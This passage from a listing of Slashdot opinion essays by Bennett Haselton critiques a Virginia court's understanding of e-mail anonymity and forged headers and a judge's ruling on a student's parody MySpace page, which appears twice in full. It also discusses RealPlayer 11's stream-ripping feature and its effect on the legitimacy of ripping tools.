    These are statements that are only true if you play some kind of parlor game to find a way to read them as "true," not statements that indicate the court knew what was going on. To review: IP addresses in the U.S. are generally allocated by ARIN in blocks to Internet service providers and Web hosting companies; these companies then lease the IP addresses to their customers. You can look up an IP address with ARIN to determine which ISP or hosting company has been assigned that particular block, but the ISP or hosting company generally won't tell you the identity of their customer who has leased it from them. And anybody can register a domain, but most domain registrars give you the option of registering the domain anonymously, so that only the registrar knows the owner's true identity. So the court's statement that a database search "can eventually lead" to contact information is correct only if you clarify that it "can" lead there, but it usually won't. As a finding of fact, this is 100% true, and about as useful as "Obama might win in November. Or he might not."

    But it's impossible to defend what the court says next:

    As shown by the record, because e-mail transmission protocol requires entry of an IP address and domain name for the sender, the only way such a speaker can publish an anonymous e-mail is to enter a false IP address or domain name. Therefore ... registered IP addresses and domain names discoverable through searchable data bases and registration documents "necessarily result[] in a surrender of [the speaker's] anonymity."

    Now, there are two possible definitions of "anonymity" to consider: (1) you can be anonymous to the extent that ordinary citizens reading your content cannot determine your identity without a subpoena; or (2) you can be anonymous to the extent that even the government, armed with subpoenas and wiretaps, can never find out who you are. But under either interpretation of the word, the court's statement that "the only way such a speaker can publish an anonymous e-mail is to enter a false IP address or domain name," is wrong.

    By default, almost all Internet users are already anonymous in the first sense, even without using forged headers or other tricks in their e-mails. When you send e-mail through your own Internet service provider's mail server, or when you log on to Hotmail and send messages from a Hotmail account, or when you lease a dedicated server from a Web hosting company and use it to send mails, the messages don't contain any more information about your true identity than you decide to put in them. Only the government could ordinarily discover your identity in those cases, by looking at the IP address that the message was sent from, and subpoenaing the Internet service provider or hosting company for the identity of the person using that IP address at that time.

    But there are even ways to be anonymous in the second sense -- such that not even the government could identify you -- without resorting to forged e-mail headers. You can create Hotmail and Gmail accounts without giving the providers any of your true information. When you send messages through those services, they pass along the IP address that you used to connect to their Web sites, but you can obscure your IP address as well, by using an anonymizing proxy or a service like Tor.

    Elsewhere in their decision, the court indicated that what they really wanted to protect was the right to send anonymous bulk e-mails that were political or otherwise non-commercial. But even by that standard, it's still possible to use Hotmail and Gmail together with an anonymizing proxy (the mail services do impose limits on how many messages each account can send in a day, but if you want to send bulk mails badly enough, you can always sign up for multiple accounts). And if you only care about staying beyond the reach of U.S. subpoena power, you can always sign up for a dedicated host overseas and send the bulk mails from there.

    Apart from the court's misstatement that forged headers are the only way to publish anonymously in e-mail, there is the incorrect presumption that forged headers actually do afford anonymity in either of the senses given above. The court wrote, "[T]he only way such a speaker can publish an anonymous e-mail is to enter a false IP address or domain name." But while it is possible to enter any domain you want in your return e-mail address when you send an e-mail, the court apparently didn't know what it was talking about when it referred to "entering a false IP address." You can't just "enter" any arbitrary IP address when sending an e-mail. If user@domain name.com receives an e-mail, the mail server at domain name.com has to receive the message over a connection made from some other machine, and the domain name.com mail server can always see the IP address of the machine on the other end of the connection. Normally, this machine on the other end would be the mail server of the sender's Internet service provider. Or if the sender has leased a dedicated machine at a hosting company, that dedicated machine would be the one connecting to the domain name.com mail server. Some desktop spamming programs let you turn your home computer into the sending mail server, so that it connects directly with the remote mail server to send the message. In all of these cases, the receiving mail server can see the IP address of the sending machine, so a government subpoena would usually be enough to determine the sender's identity. (I know you all know this, but I have delusions that some helpful clerk will print out this article and explain this to the judge.)

    When spammers "enter" false IP addresses in sending mails, that usually means entering made-up IP addresses in headers that are sent along with the contents of the message. However, these would normally only have the effect of throwing someone off the trail who opened the message sent to user@domain name.com and was reading the headers manually. Perhaps they would see some random IP addresses scattered in the headers, would go to ARIN and look up the hosting company or ISP that those IP addresses were assigned to, and would mistakenly file a complaint with that company. But the domain name.com server can always see the true IP address that the message was received from, and for people who know how to read the headers properly, that IP address will be indicated in the headers as the address that connected to the domain name.com mail server to send the mail.

    So the court's statement that "the only way such a speaker can publish an anonymous e-mail is to enter a false IP address or domain name" is doubly wrong: because it's easy to send e-mails anonymously without using forged headers, and because forged headers do not in fact provide the level of anonymity that the court said should be protected anyway. The only way to truly obscure your identity by hijacking a third-party IP address without permission, would be to hack into a third party's computer, by infecting a user's home computer with a Trojan horse for example, and using it to send mail. Presumably the court was not contemplating that such an activity should be considered legal, even as a means of sending political speech.

    It would presumably be unconstitutional for an anti-spam law to prohibit anonymous political e-mails which attempted to hide the sender's identity -- that is after all what "anonymous" means! You couldn't pass a law outlawing Tor, for example. But the Virginia law doesn't apply to senders merely trying to hide their identity, it applies only to the use of computers "to falsify or forge electronic mail transmission information or other routing information in any manner in connection with the transmission of unsolicited bulk electronic mail" (emphasis added). There is a difference between obscuring one's identity (which Tor and anonymous remailers allow you to do), and actively trying to frame an existing third party by using forged headers to make the mail appear that it came from somewhere else, especially when sending bulk mail, which is likely to generate complaints whether it's commercial or not.

    By contrast, the Washington anti-spam law prohibits any mail which "misrepresents or obscures" the origin of the message (emphasis added). This is broader and could be construed to include a wider range of things, such as the use of overseas IP addresses to send bulk mail on behalf of a U.S. company, or the use of anonymously registered domains to hide the sender's identity. It would probably be unconstitutional to prohibit these obscuring techniques for non-commercial anonymous e-mail, which is why the Washington law specifically applies only to commercial messages.

    But here I'm getting into issues like constitutional law where different experts might disagree. The clear-cut technical fact is that, contrary to the court's ruling, forged e-mail headers do not provide true anonymity when sending mail, whereas there are other, legal, ways of sending mail that do make the sender truly anonymous.

    What is frustrating about the court's misstatements about IP addresses, domain names, and anonymity, is that the judge is obviously intelligent and could have understood the concepts if they had been explained correctly to him. I held some misconceptions for a long time myself about domain names and IP addresses, because the first explanations I read were incomplete or wrong, or I didn't understand them. But the mistakes in the ruling would have been caught if the judge had just showed a draft to an Internet guru and said, "Hey, can you check if there's anything wrong here?" I know, I know, that's "just not done" (and there are probably formal rules in most states against showing a draft of a ruling to a third party before publishing it, even if the third party reviewer is sworn to secrecy, as they should be). But there's nothing stopping the judge from asking a technical expert during the trial, "It seems to me that the only way to publish anonymously on the Internet would be to use forged headers in e-mail. Can you tell me if that's right before I go too far down that line of reasoning?"

    I've appeared before judges in Small Claims court who did ask questions about any part of the technical issues that they wanted to understand, and were even willing to revise some prior misconceptions. But all of them, even the open-minded ones, proceed by gathering information during the trial, and then in the conclusion, spell out their argument and their ruling (during which time you're not allowed to interrupt), which is then set in stone unless you appeal. I've never seen a judge say, "Here's the line of reasoning in my head right now, and my tentative conclusion. Is there anything in that chain of reasoning that you want to dispute, before I make it final? I am not promising to change my mind just because you disagree with something. But I will take it into account." This is essentially what scientists do when they submit their papers for peer review before publishing them, to minimize the chance of making an error. Judges could do the same thing -- if not formally, because they're not allowed to show opinions to third parties, then at least informally, by running their ideas past the experts assembled in their courtroom -- to reduce the chance of making a mistake. But have you ever heard of a judge doing that?

    The Virginia judges probably did about as well as one could be expected to do, having learned all these technical terms only recently, and then withdrawing to their chambers to form an argument without any feedback from any technical experts. So, given the technical howlers that ended up in the ruling, the moral is that forming an argument in isolation from experts is probably not the right way to go about it.

  41. Judge Munley is So Out of My Top 8

    Features · · posted by CmdrTaco · from the surprised-he-was-there-in-the-first-place dept. · 791 comments
    Frequent Slashdot Contributor Bennett Haselton writes "A federal judge has ruled that a school district didn't violate a student's free speech rights when it suspended her for a parody MySpace page she created calling her principal a sex addict who "hits on students". In the ruling, Judge James M. Munley made the curious argument that if the case involves a student publishing lewd and offensive speech outside of school on their own time, then the proper precedent-setting cases to look to, are cases involving students making offensive statements in school during school hours, not cases involving students making less-offensive statements outside of school on their own time. In other words, if you can't find prior caselaw where all of the factors are the same, then the lewd-speech issue is more significant than the issue of whether the speech was made in or out of school." Hit that magical link below to read the rest of these words.

    Apart from the politics of minors' free speech rights in general, I think there are at least three logical problems with the ruling. The first is the judge's argument that even though on-campus speech and off-campus speech are separate, if the off-campus speech is offensive enough, that elevates it to the point of giving the school jurisdiction over it. The second is the judge's comparison between a student's parody MySpace page, and the mock-threatening rap lyrics that got a student expelled in another court case -- a court ruled that the school overstepped their bounds by expelling the student for the rap song, but Judge Munley said that a MySpace page jokingly calling the principal a "sex addict" was actually more offensive than the violent rap lyrics. The third is the argument that because the student's conduct was so offensive that it could have theoretically been criminally punished if the principal took her to court, that made it acceptable for the school to take the easier route of suspending her.

    All right, all together now: I'm not a lawyer, and probably neither are you. But as I've said before, if you put 10 judges in 10 separate rooms and asked them to decide this case (or any other case) independently of each other, you'd be very unlikely to get a consensus anyway. The importance of courts in a civilized society is that they provide a peaceful means of settling disputes, not because we expect that the judges will actually get the "right" answer -- that's why we don't have a crisis of faith in the system every time the Supreme Court splits 5-4. (By contrast, when physicists work on problems involving car safety and satellite trajectories, we do care about them getting the "right" answer, and so physicists are held to a higher standard than judges -- we expect that 9 physicists working on the same problem in separate rooms would all get the same result.) That goes for the rest of us too -- I have no independent confirmation that I'm right, and anyone ranting with supreme confidence that I'm wrong, has no independent confirmation that they're right, either. The best we can do is try to make arguments that are logically consistent, and check that even if they are free of internal contradicions, that they also can't be carried through to an absurd conclusion.

    To wit: Judge Munley's decision cites four prior cases that involved students making offensive or disruptive speech (although still not as offensive as the MySpace page in this case calling the principal a pedophile) while on school property or at school events: Bethel School Dist v. Fraser, Hazlewood Sch. Dist. v. Kuhlmeier, Morse v. Frederick, and Klein v. Smith. In those cases, the courts ruled that the discipline did not violate the students' rights because the students were at school events or on campus when they made the statements at issue. Judge Munley then cites another list of cases in which students published speech that was generally more offensive than the incidents in the first list, but did it on their own time, away from school: Flaherty v. Keystone Oaks Sch. Dist., Latour v. Riverside Beaver Sch. Dist., Killion v. Franklin Regaional Sch. Dist., and Layshock v. Hermitage Sch. Dist. In all of these cases, the courts ruled that the school districts violated the students' rights by punishing them for off-campus speech. So far, all eight of these cases cited by Munley, followed the rule: on-campus or school-affiliated speech is punishable, off-campus speech is not. (Munley cites only one case that was an exception to this rule: Fenton v. Stear, in which the court upheld the punishment of a student who was off campus when he loudly referred to a teacher as a "prick.")

    But then, Judge Munley argues more or less that the speech in this case is so offensive (calling the principal a sex addict and a pedophile), that you're allowed to lift it out of the category of off-campus speech and treat it by analogy to earlier cases involving on-campus speech. Munley wrote:

    In the instant case, there can be no doubt that the speech used is vulgar and lewd. The profile contains words such as "fucking," "bitch," "fagass," "dick," "tight ass," and "dick head." The speech does not make any type of political statement. It is merely an attack on the school's principal. It makes him out to be a pedophile and sex addict. This speech is not the Tinker silent political protest. It is more akin to the lewd and vulgar speech addressed in Fraser. It is also akin to the speech that promoted illegal actions in the Morse case.

    The content itself is "akin" to the offensive speech in the earlier cases, but what difference does that make, if the speech didn't take place in school? Getting back to first principles: Why does the First Amendment generally grant the freedom to call people "dick" and "tight ass"? Because it doesn't hurt anyone except to the extent that it hurts their feelings, and you don't have a right to unhurt feelings. Because the remarks can be made in the context of general legitimate criticism of someone, which might motivate them to change the behavior that led someone to call them a "tight ass" in the first place. Once these premises are accepted, it doesn't matter if you ratchet up the offensiveness from calling someone a "dick" to calling them a "fucking dick." It does change the analysis if you move the speech to a different setting, e.g. standing up in class when people are trying to learn, and shouting that the principal is a "fucking dick." But that's not what this student was doing.

    After all, if the regulation of off-campus speech were justified in order to prevent harm or embarrassment to the principal, carry that through to its logical conclusion: Suppose a former student, who had since graduated, created the parody MySpace page and e-mailed it to friends at the school. The school's "interest" in preserving order and protecting the principal's reputation, would be exactly the same -- and yet no court has ever suggested that the government can punish a former student for speech outside of school (unless the speech rises to the level of threats or libel, which anyone can be punished for, regardless of the former student-principal relationship). To be punished, the former student would have to bring the speech into the school, where it could cause a disruption (and where, as a non-student, they could be banned from the premises anyway).

    As for the second problem, apart from the issue of whether offensiveness alone is enough to give the school the right to punish a student for off-campus speech, there is the question of what criteria Judge Munley used to determine that the MySpace page was more offensive than the student off-campus speech in previous cases. In Latour v. Riverside Beaver Sch. Dist. , the court found that a student's rap lyrics which made mock threats toward another student, identified by name, could not be treated as a true threat because they were the kind of boastful posturing that rappers are known for (apparently including the ones in junior high school these days). Similarly, the MySpace page created in this case, began with the words:

    yes. It's your oh so wonderful, hairy,
    expressionless, sex addict, fagass, put on this world
    with a small dick PRINCIPAL

    and hopefully the principal would agree that any reasonable reader would know this was not written by him. So if the content of the speech in both cases was clearly not meant to be taken seriously, a fair apples-to-apples comparison would be to ask which is the more offensive topic: violence, or a joke about a principal listing among his "interests": "detention, being a tight ass, riding the fraintrain, spending time with my child (who looks like a gorilla), baseball, my golden pen, fucking in my office, hitting on students and their parents"?

    What Judge Munley seems to be saying is that joking about murder is more acceptable than joking about a principal hitting on students. While I think this is absurd and offensive to victims of violence, I have to admit that this is at least consistent with standards of censorship in the U.S. It's a tired old complaint, but it's never been satisfactorily answered: Why can you show a character being killed on television, but a sex act is taboo? Why are the most offensive swear words derived from sex acts and sex organs, but there are no equivalent words for murder that are banned from the airwaves? What's worse?

    Third, the judge seemed to adopt the position that because the student could theoretically have been prosecuted for creating the fake MySpace profile, that made it acceptable for the school to impose a milder punishment that circumvented the court system. Judge Munley wrote:

    The speech at issue here could have been the basis for criminal charges against J.S. Additionally, the state police indicated to McGonigle that he could press harassment charges based upon the imposter profile. (Dep. McG, 98- 99). McGonigle indicated that he would not press charges, but asked the police officer to contact the students involved and their parents to inform them of the seriousness of the situation. (Dep. McG at 99, 163-64). The officer summoned the students and their parents to the state police station and discussed the seriousness of the profile and that McGonigle would not press charges.

    It's at least debatable whether the MySpace page, which was an obvious parody, could have been the basis for criminal charges. But suppose we grant the judge that point. In that case, even if we know that someone's actions would have gotten them a more severe punishment from the courts, is it acceptable to give them a lighter punishment for something else, just because that's simpler for the school?

    No. First, because it fosters disrespect for the rule of law in general: If you committed X, then you should be punished for X, according to the rules set up for punishing X. When Judge Jackie Glass began O.J. Simpson's trial this month for robbing two men at gunpoint, she told jurors: "If you think you are going to punish Mr Simpson for what happened in 1995, this is not the case for you." She, like most sentient beings, probably believed privately that O.J. committed the murders in 1994, but she knew the rule of law was more important than the outcome of any one case, even a murder trial. Second, lighter punishments (such as a suspension from school) often come with a lower standard of judicial review, so you could end up getting an undeserved punishment, in cases where a proper trial for the actual crime at issue might have found that you should not have been punished at all. (Al Capone did get put away for tax evasion, but the court found that he was in fact guilty of tax evasion -- they weren't reaching that as a compromise to avoid trying him for his crimes as a gangster.)

    To come clean, however, I have to admit that I have tried to egg judges down that route occasionally. I've taken spammers to court and gotten them to say, under oath, that they never sent any spam and didn't know what I was talking about, before I revealed a tape-recording of a conversation (recorded legally) in which they offered to send 5 million pieces of spam for $500, that the spams were routed out through a server in China to help defeat spam filters, etc. The idea was that the judge would get pissed at the spammer for committing perjury, but realize that it would be too much paperwork to prosecute that, so just bang them over the head with a thousand-dollar judgment for spamming, which would go to me. Unfortunately this can backfire if the judge is so opposed to anti-spam suits that no amount of evidence will convince them anyway. But even if it had worked, it would not be strictly correct to say that justice had been done -- perjury should be punished as perjury, even if only with a slap on the wrist.

    So, I'm sure that Judge Munley was trying in his own way to do the right thing by preserving order in the school system, but he probably decided in advance what conclusion to reach, and came up with the arguments after the fact. Still, it may not be a loss for student rights in the long run. The ACLU, which represented the student, has not said whether they will appeal, and anyway, virtually all other caselaw so far has said that student speech off campus is protected, as Judge Munley himself pointed out.

  42. Judge Munley is So Out of My Top 8

    Features · · posted by CmdrTaco · from the surprised-he-was-there-in-the-first-place dept. · 791 comments
    Frequent Slashdot Contributor Bennett Haselton writes "A federal judge has ruled that a school district didn't violate a student's free speech rights when it suspended her for a parody MySpace page she created calling her principal a sex addict who "hits on students". In the ruling, Judge James M. Munley made the curious argument that if the case involves a student publishing lewd and offensive speech outside of school on their own time, then the proper precedent-setting cases to look to, are cases involving students making offensive statements in school during school hours, not cases involving students making less-offensive statements outside of school on their own time. In other words, if you can't find prior caselaw where all of the factors are the same, then the lewd-speech issue is more significant than the issue of whether the speech was made in or out of school." Hit that magical link below to read the rest of these words.

    Apart from the politics of minors' free speech rights in general, I think there are at least three logical problems with the ruling. The first is the judge's argument that even though on-campus speech and off-campus speech are separate, if the off-campus speech is offensive enough, that elevates it to the point of giving the school jurisdiction over it. The second is the judge's comparison between a student's parody MySpace page, and the mock-threatening rap lyrics that got a student expelled in another court case -- a court ruled that the school overstepped their bounds by expelling the student for the rap song, but Judge Munley said that a MySpace page jokingly calling the principal a "sex addict" was actually more offensive than the violent rap lyrics. The third is the argument that because the student's conduct was so offensive that it could have theoretically been criminally punished if the principal took her to court, that made it acceptable for the school to take the easier route of suspending her.

    All right, all together now: I'm not a lawyer, and probably neither are you. But as I've said before, if you put 10 judges in 10 separate rooms and asked them to decide this case (or any other case) independently of each other, you'd be very unlikely to get a consensus anyway. The importance of courts in a civilized society is that they provide a peaceful means of settling disputes, not because we expect that the judges will actually get the "right" answer -- that's why we don't have a crisis of faith in the system every time the Supreme Court splits 5-4. (By contrast, when physicists work on problems involving car safety and satellite trajectories, we do care about them getting the "right" answer, and so physicists are held to a higher standard than judges -- we expect that 9 physicists working on the same problem in separate rooms would all get the same result.) That goes for the rest of us too -- I have no independent confirmation that I'm right, and anyone ranting with supreme confidence that I'm wrong, has no independent confirmation that they're right, either. The best we can do is try to make arguments that are logically consistent, and check that even if they are free of internal contradicions, that they also can't be carried through to an absurd conclusion.

    To wit: Judge Munley's decision cites four prior cases that involved students making offensive or disruptive speech (although still not as offensive as the MySpace page in this case calling the principal a pedophile) while on school property or at school events: Bethel School Dist v. Fraser, Hazlewood Sch. Dist. v. Kuhlmeier, Morse v. Frederick, and Klein v. Smith. In those cases, the courts ruled that the discipline did not violate the students' rights because the students were at school events or on campus when they made the statements at issue. Judge Munley then cites another list of cases in which students published speech that was generally more offensive than the incidents in the first list, but did it on their own time, away from school: Flaherty v. Keystone Oaks Sch. Dist., Latour v. Riverside Beaver Sch. Dist., Killion v. Franklin Regaional Sch. Dist., and Layshock v. Hermitage Sch. Dist. In all of these cases, the courts ruled that the school districts violated the students' rights by punishing them for off-campus speech. So far, all eight of these cases cited by Munley, followed the rule: on-campus or school-affiliated speech is punishable, off-campus speech is not. (Munley cites only one case that was an exception to this rule: Fenton v. Stear, in which the court upheld the punishment of a student who was off campus when he loudly referred to a teacher as a "prick.")

    But then, Judge Munley argues more or less that the speech in this case is so offensive (calling the principal a sex addict and a pedophile), that you're allowed to lift it out of the category of off-campus speech and treat it by analogy to earlier cases involving on-campus speech. Munley wrote:

    In the instant case, there can be no doubt that the speech used is vulgar and lewd. The profile contains words such as "fucking," "bitch," "fagass," "dick," "tight ass," and "dick head." The speech does not make any type of political statement. It is merely an attack on the school's principal. It makes him out to be a pedophile and sex addict. This speech is not the Tinker silent political protest. It is more akin to the lewd and vulgar speech addressed in Fraser. It is also akin to the speech that promoted illegal actions in the Morse case.

    The content itself is "akin" to the offensive speech in the earlier cases, but what difference does that make, if the speech didn't take place in school? Getting back to first principles: Why does the First Amendment generally grant the freedom to call people "dick" and "tight ass"? Because it doesn't hurt anyone except to the extent that it hurts their feelings, and you don't have a right to unhurt feelings. Because the remarks can be made in the context of general legitimate criticism of someone, which might motivate them to change the behavior that led someone to call them a "tight ass" in the first place. Once these premises are accepted, it doesn't matter if you ratchet up the offensiveness from calling someone a "dick" to calling them a "fucking dick." It does change the analysis if you move the speech to a different setting, e.g. standing up in class when people are trying to learn, and shouting that the principal is a "fucking dick." But that's not what this student was doing.

    After all, if the regulation of off-campus speech were justified in order to prevent harm or embarrassment to the principal, carry that through to its logical conclusion: Suppose a former student, who had since graduated, created the parody MySpace page and e-mailed it to friends at the school. The school's "interest" in preserving order and protecting the principal's reputation, would be exactly the same -- and yet no court has ever suggested that the government can punish a former student for speech outside of school (unless the speech rises to the level of threats or libel, which anyone can be punished for, regardless of the former student-principal relationship). To be punished, the former student would have to bring the speech into the school, where it could cause a disruption (and where, as a non-student, they could be banned from the premises anyway).

    As for the second problem, apart from the issue of whether offensiveness alone is enough to give the school the right to punish a student for off-campus speech, there is the question of what criteria Judge Munley used to determine that the MySpace page was more offensive than the student off-campus speech in previous cases. In Latour v. Riverside Beaver Sch. Dist. , the court found that a student's rap lyrics which made mock threats toward another student, identified by name, could not be treated as a true threat because they were the kind of boastful posturing that rappers are known for (apparently including the ones in junior high school these days). Similarly, the MySpace page created in this case, began with the words:

    yes. It's your oh so wonderful, hairy,
    expressionless, sex addict, fagass, put on this world
    with a small dick PRINCIPAL

    and hopefully the principal would agree that any reasonable reader would know this was not written by him. So if the content of the speech in both cases was clearly not meant to be taken seriously, a fair apples-to-apples comparison would be to ask which is the more offensive topic: violence, or a joke about a principal listing among his "interests": "detention, being a tight ass, riding the fraintrain, spending time with my child (who looks like a gorilla), baseball, my golden pen, fucking in my office, hitting on students and their parents"?

    What Judge Munley seems to be saying is that joking about murder is more acceptable than joking about a principal hitting on students. While I think this is absurd and offensive to victims of violence, I have to admit that this is at least consistent with standards of censorship in the U.S. It's a tired old complaint, but it's never been satisfactorily answered: Why can you show a character being killed on television, but a sex act is taboo? Why are the most offensive swear words derived from sex acts and sex organs, but there are no equivalent words for murder that are banned from the airwaves? What's worse?

    Third, the judge seemed to adopt the position that because the student could theoretically have been prosecuted for creating the fake MySpace profile, that made it acceptable for the school to impose a milder punishment that circumvented the court system. Judge Munley wrote:

    The speech at issue here could have been the basis for criminal charges against J.S. Additionally, the state police indicated to McGonigle that he could press harassment charges based upon the imposter profile. (Dep. McG, 98- 99). McGonigle indicated that he would not press charges, but asked the police officer to contact the students involved and their parents to inform them of the seriousness of the situation. (Dep. McG at 99, 163-64). The officer summoned the students and their parents to the state police station and discussed the seriousness of the profile and that McGonigle would not press charges.

    It's at least debatable whether the MySpace page, which was an obvious parody, could have been the basis for criminal charges. But suppose we grant the judge that point. In that case, even if we know that someone's actions would have gotten them a more severe punishment from the courts, is it acceptable to give them a lighter punishment for something else, just because that's simpler for the school?

    No. First, because it fosters disrespect for the rule of law in general: If you committed X, then you should be punished for X, according to the rules set up for punishing X. When Judge Jackie Glass began O.J. Simpson's trial this month for robbing two men at gunpoint, she told jurors: "If you think you are going to punish Mr Simpson for what happened in 1995, this is not the case for you." She, like most sentient beings, probably believed privately that O.J. committed the murders in 1994, but she knew the rule of law was more important than the outcome of any one case, even a murder trial. Second, lighter punishments (such as a suspension from school) often come with a lower standard of judicial review, so you could end up getting an undeserved punishment, in cases where a proper trial for the actual crime at issue might have found that you should not have been punished at all. (Al Capone did get put away for tax evasion, but the court found that he was in fact guilty of tax evasion -- they weren't reaching that as a compromise to avoid trying him for his crimes as a gangster.)

    To come clean, however, I have to admit that I have tried to egg judges down that route occasionally. I've taken spammers to court and gotten them to say, under oath, that they never sent any spam and didn't know what I was talking about, before I revealed a tape-recording of a conversation (recorded legally) in which they offered to send 5 million pieces of spam for $500, that the spams were routed out through a server in China to help defeat spam filters, etc. The idea was that the judge would get pissed at the spammer for committing perjury, but realize that it would be too much paperwork to prosecute that, so just bang them over the head with a thousand-dollar judgment for spamming, which would go to me. Unfortunately this can backfire if the judge is so opposed to anti-spam suits that no amount of evidence will convince them anyway. But even if it had worked, it would not be strictly correct to say that justice had been done -- perjury should be punished as perjury, even if only with a slap on the wrist.

    So, I'm sure that Judge Munley was trying in his own way to do the right thing by preserving order in the school system, but he probably decided in advance what conclusion to reach, and came up with the arguments after the fact. Still, it may not be a loss for student rights in the long run. The ACLU, which represented the student, has not said whether they will appeal, and anyway, virtually all other caselaw so far has said that student speech off campus is protected, as Judge Munley himself pointed out.

  43. Corporate Behemoth Keeps Ripping "Real"

    · posted by ryuzaki0 · from the ripping-rocks dept. · 121 comments
    Slashdot contributor Bennett Haselton has written in with a tale of media rippers and corporate giants "In 2001 RealNetworks sued and blocked Streambox from distributing the Ripper, a program that let users rip and save RealAudio and RealVideo streams even if the stream contained a proprietary "do not copy" flag. Then one year ago this month, RealNetworks caused a stir by releasing a beta of RealPlayer 11 that similarly let the user record and save streams from sites like YouTube and Pandora. YouTube rippers and the like had existed before, but this was the first time a major company had included a stream ripper in its media player. And while RealPlayer 11 didn't explicitly ignore any copy protection flags, the release still provoked legal rumblings: in a Variety article by Scott Kirsner, an anonymous network exec said accused RealNetworks of 'aiding and abetting piracy' and said that they would 'more likely than not' take action against RealNetworks. But now that the feature has stayed in RealPlayer for a year, its real impact will be not on piracy but on the perceived legitimacy of ripping programs. The corporate behemoth, raked over the coals in the past for privacy violations and nuisance-ware, strikes a blow for free-culture hackers." The rest of Bennett's essay is available by following that magical link right below these words.

    First, the reasons I don't think that RealPlayer has much effect on actual piracy. Yes, if a pirate has uploaded your favorite song to YouTube, you can save a copy of the video file to hear the song over and over, but you can do the same thing on YouTube itself as long as you're connected to the Internet. The anonymous network exec in the Variety article points out that RealPlayer "allows you to own [content] forever on your hard drive, even if the Web site that distributed that content illegally has taken it down in because we've complained." But regardless of what complaints they've been sending, almost all popular songs are currently available for listening on YouTube so that anyone with a Net connection can get them on demand, and that's a separate issue, with or without RealPlayer.

    So then it becomes a question of whether RealPlayer enables the user to do more interesting things with the song or video, like take it with them on an iPod. RealPlayer only lets you save YouTube videos as an FLV file. But as long as doing things like playing an FLV file on an iPod requires an outside hack, that option is only available to people who are resourceful enough to go out and find tools like that (admittedly not a very high bar, but too hard for many people). So, suppose you define a "resourceful" person as someone smart enough to figure out how to convert an FLV file into an iPod-viewable format. Then there are two possibilities: (a) either a person is not that "resourceful", in which case if they want content to take with them, they'll still have to get it through legitimate channels like the iTunes store, or (b) if the person is "resourceful", they would have known about tools for ripping YouTube videos to MP3, long before RealPlayer 11 came out (in fact, most sites that come up in a search for "flv to mp3 converter" are just rippers specifically for YouTube). In either case, RealPlayer's ability to save FLV files has no impact on the market for the song.

    I haven't talked about some outlier cases where RealPlayer could perhaps help a novice user avoid paying for content (if a novice pirate didn't know enough to download a movie from a BitTorrent network, they could perhaps save up enough interesting videos from YouTube for a long plane ride where they won't have Internet access). But there's an easy way to get a verdict on RealPlayer's impact on piracy: How much have you heard teenagers talking about it? You heard teens through the years buzzing about Napster, KaZaA, and BitTorrent, but... RealPlayer? The cliche among teenagers today is to go "find something on YouTube", but "and then grab it with RealPlayer" has yet to prove useful enough to enter the vernacular.

    Similarly, RealPlayer can be used to rip streams from Pandora, but it's just hard enough to do it that most people are likely to give up. Before going into details, I should say that I'm against anyone trying to circumvent paying for music. Most of the time when you read that on the Web, it carries this nudge-wink subtext right before the author launches into a detailed description about how, exactly, to circumvent paying for music. But I really do believe that there is a vast untapped potential of unwritten good music out there, and that it could be tapped if there were only lower barriers of entry for musicians, better channels to distribute music to users, and a guarantee that users would pay instead of stealing it -- all of which is helped by services like Pandora. On the other hand, I also believe that if a copying scheme can be circumvented, and especially if it can be circumvented in a way that's fairly easy to discover, there's no point in keeping it secret: We might as well push things forward by acknowledging that the scheme is beatable, and deciding what to do about it.

    The outing commences: if you save a stream from Pandora, RealPlayer will give you an error if you try to play the stream back from your RealPlayer library. But if you find the "mp4" file in your RealPlayer downloads, you can play it in WinAmp. However, the file as saved will not play in Windows Media Player, iTunes, or RealPlayer itself. Plus, since Pandora does not let you pick which song you want to listen to on demand, your stream might contain all the songs that you had to skip past to get the one you wanted, and you'd have to find a utility to edit the mp4 file to get rid of that cruft at the beginnig. At some point, the effort probably exceeds the dollar you'd have to pay to get the song on iTunes (or, if you're a pirate, the effort to find it on a p2p network).

    Again, the "teenager buzz test" is instructive. You do hear kids these days talking about listening to songs on Pandora, but not about ripping them with RealPlayer.

    Where I think RealPlayer will make the most difference in the long run is in its political and legal impact, by legitimizing stream-ripping as something that "real" companies, so to speak, are allowed to do. In 2006, Google sent a cease-and-desist letter to TechCrunch for hosting a tool that lets users save YouTube videos to their hard drives. Michael Arrington of TechCrunch blogged at the time, "I am likely to remove the tool to preserve my relationship with the company [Google/YouTube]", but the tool is still up, and I don't know whether it was ever taken down at all (TechCrunch did not respond to an inquiry). Today, there are more YouTube rippers than ever, several of them even running AdSense ads. (I'm not sure if that's within Google's rules, but I mentioned those sites while e-mailing back and forth with Google for this article, and they're all still running AdSense ads a week later.) Certainly Google would look pretty silly trying to force TechCrunch to take their ripper down today, now that Google itself is distributing RealPlayer as part of the Google Pack.

    RealNetworks could argue that the main difference between RealPlayer 11, and the Streambox Ripper that they sued to have outlawed in 2001, was that the Streambox Ripper ignored the "do not copy" flag present in some RealAudio and RealVideo streams, and thus violated the Digital Millenium Copyright Act. RealNetworks says the do-not-copy flag is no longer used, having been supplanted by more sophisticated Digital Rights Management, and RealPlayer 11 will honor any DRM-protected streams and refuse to save them. But how much difference is there between "ignoring" the do-not-copy flag and "ignoring" the Terms of Service for sites like YouTube (which the program may not be aware of, but which its makers certainly are)?

    We've all heard about the First Amendment implications of DeCSS code, the code for decrypting the copy-protection scheme on DVDs, being outlawed in the U.S. But the Streambox case set the bar for "violating the DMCA" considerably lower -- the Streambox Ripper didn't actively decrypt anything, it just ignored a flag set in the streaming media. What are the implications if "ignoring" a flag counts as "breaking" copy protection? Suppose Behemoth Corp releases Version 1 of some media format, and I release a third-party player that plays Version 1. Then Behemoth Corp releases the specs for Version 2 of the format, which is similar enough that it works in Version 1 players, except Version 2 now contains a "do-not-copy" flag, which my player doesn't know about. Is my player now illegal? (Well, in this case Behemoth Corp would just make sure that Version 2 doesn't play in Version 1 players. But what about general-purpose programs like Total Recorder that can record any sound playing through your computer to an MP3 file? Does that program become illegal if a company releases a new sound file format that they don't want to be copyable?) So I think the acceptance of RealPlayer has nudged us closer to legal acceptance of software that can interact with third-party sites and programs in a way that their makers don't like. That's good. It should not be against the law to make a program that interacts with third-party web sites in a way that they haven't given permission for, something I literally grew up saying.

